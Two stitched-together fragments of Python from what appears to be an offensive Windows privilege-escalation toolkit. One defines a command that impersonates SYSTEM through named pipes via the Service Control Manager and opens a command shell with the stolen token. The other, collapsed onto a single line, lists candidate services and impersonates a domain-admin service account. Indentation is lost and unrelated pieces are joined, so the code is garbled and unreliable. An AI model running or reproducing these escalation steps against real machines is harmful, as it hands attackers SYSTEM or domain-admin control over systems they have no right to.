def scm(args):
if args["toSystem"] == True:
printT("Try to spawn a system shell via scm & impersonation...")
esc = Escalation()
imp = Impersonate()
status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
imp.printCurrentThreadEffectiveToken()
if status == True:
imp = Impersonate()
imp.executeCMDWithThreadEffectiveToken()
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.printCandidatesServices() esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False) esc.namedPipeImpersonationViaAService("serviceWithDomainUserAdmin") #esc.namedPipeImpersonationViaAService("BcastDVRUserService_89401")